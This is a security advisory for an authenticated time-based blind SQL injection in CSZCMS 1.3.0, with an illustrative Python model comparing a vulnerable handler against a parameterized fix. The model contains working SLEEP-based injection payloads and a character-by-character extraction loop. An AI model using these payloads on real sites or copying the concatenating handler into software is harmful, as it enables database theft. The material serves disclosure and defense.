CSZ CMS · CVE-2024-58307
**Name of the Vulnerable Software and Affected Versions**
CSZCMS version 1.3.0
**Description**
CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality. The `view` parameter of the members view endpoint is used in a database query without proper sanitization or parameter binding, so an authenticated attacker can inject SQL through it. The issue is exploitable as time-based blind SQL injection: the attacker injects conditional delays and infers database contents from the response time, which allows database information to be extracted even though the response itself shows no query output.
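The following is an added, hypothetical model of the pattern described above; it is not CSZCMS code and the table, handler names and sample rows are constructed for the illustration. It uses SQLite with a user-defined `SLEEP()` to emulate MySQL's `SLEEP()`, so the timing oracle behaves the same way, and places a vulnerable concatenating handler beside a hardened parameterized one. Beyond the single-delay check, it also shows why "time-based blind" is enough to extract data: one character of a username is recovered purely from which guess makes the response slow.

```python
"""Time-based blind SQL injection through a 'view' parameter: vulnerable
vs. hardened handler, with the timing oracle an attacker would use.
Added illustration; not CSZCMS code. SQLite emulates MySQL SLEEP()."""
import sqlite3
import time

# Injected delay in seconds; kept short so the demonstration runs quickly.
DELAY = 0.2


def _sleep(seconds):
    """Emulates MySQL SLEEP(): blocks, then returns 0 as MySQL does."""
    time.sleep(seconds)
    return 0


def make_db():
    """In-memory members table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, _sleep)
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [(1, "alice"), (2, "bob")])
    return conn


def members_view_vulnerable(conn, view):
    """Hypothetical vulnerable handler: the raw 'view' value is concatenated
    into the SQL text, so attacker-supplied SQL becomes part of the query."""
    sql = "SELECT id, username FROM members WHERE id = " + str(view)
    return conn.execute(sql).fetchall()


def members_view_fixed(conn, view):
    """Hardened handler: the value is bound as a parameter. A payload such as
    '1 AND SLEEP(0.2)' is then just a string that matches no integer id."""
    sql = "SELECT id, username FROM members WHERE id = ?"
    return conn.execute(sql, (view,)).fetchall()


def timed_probe(handler, conn, view):
    """Runs a handler and returns (rows, elapsed_seconds). The elapsed time
    is the only signal a blind attacker needs."""
    start = time.monotonic()
    rows = handler(conn, view)
    return rows, time.monotonic() - start


def injected_delay_observed(handler, conn, delay=DELAY):
    """Basic time-based check: send '1 AND SLEEP(delay)' as the view value
    and report whether the response was delayed accordingly."""
    payload = "1 AND SLEEP(%s)" % delay
    _, elapsed = timed_probe(handler, conn, payload)
    return elapsed >= 0.8 * delay


def leak_char(handler, conn, member_id, position,
              charset="abcdefghijklmnopqrstuvwxyz", delay=DELAY):
    """Extracts one character of a username through timing alone: the
    conditional SLEEP fires only when the guess is correct. Returns the
    character, or None if no guess produced a delay (e.g. hardened handler)."""
    for guess in charset:
        payload = ("1 AND (SELECT CASE WHEN substr(username,%d,1)='%s' "
                   "THEN SLEEP(%s) ELSE 0 END FROM members WHERE id=%d)"
                   % (position, guess, delay, member_id))
        _, elapsed = timed_probe(handler, conn, payload)
        if elapsed >= 0.8 * delay:
            return guess
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable delayed:", injected_delay_observed(members_view_vulnerable, db))
    print("fixed delayed:", injected_delay_observed(members_view_fixed, db))
    print("leaked char:", leak_char(members_view_vulnerable, db, 1, 1))
```

Note that the vulnerable handler returns no rows for the injected payloads (SLEEP() yields 0, so the WHERE clause is false), which is exactly why the attack is blind: nothing in the response body changes, only its latency. Binding the parameter removes the injection; validating that `view` is an integer before it reaches the query is a worthwhile second layer.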
**Recommendations**
Apply the vendor's fix for this issue in CSZCMS 1.3.0, or upgrade to a release that addresses it, as soon as one is available. As a temporary workaround, restrict access to the members view functionality to trusted accounts to reduce exposure; since exploitation already requires an authenticated account, this only limits who can reach the vulnerable endpoint and does not remove the injection itself. Monitoring requests to the members view endpoint for a non-numeric `view` parameter or for SQL delay functions (such as SLEEP() or BENCHMARK() on MySQL) helps detect exploitation attempts.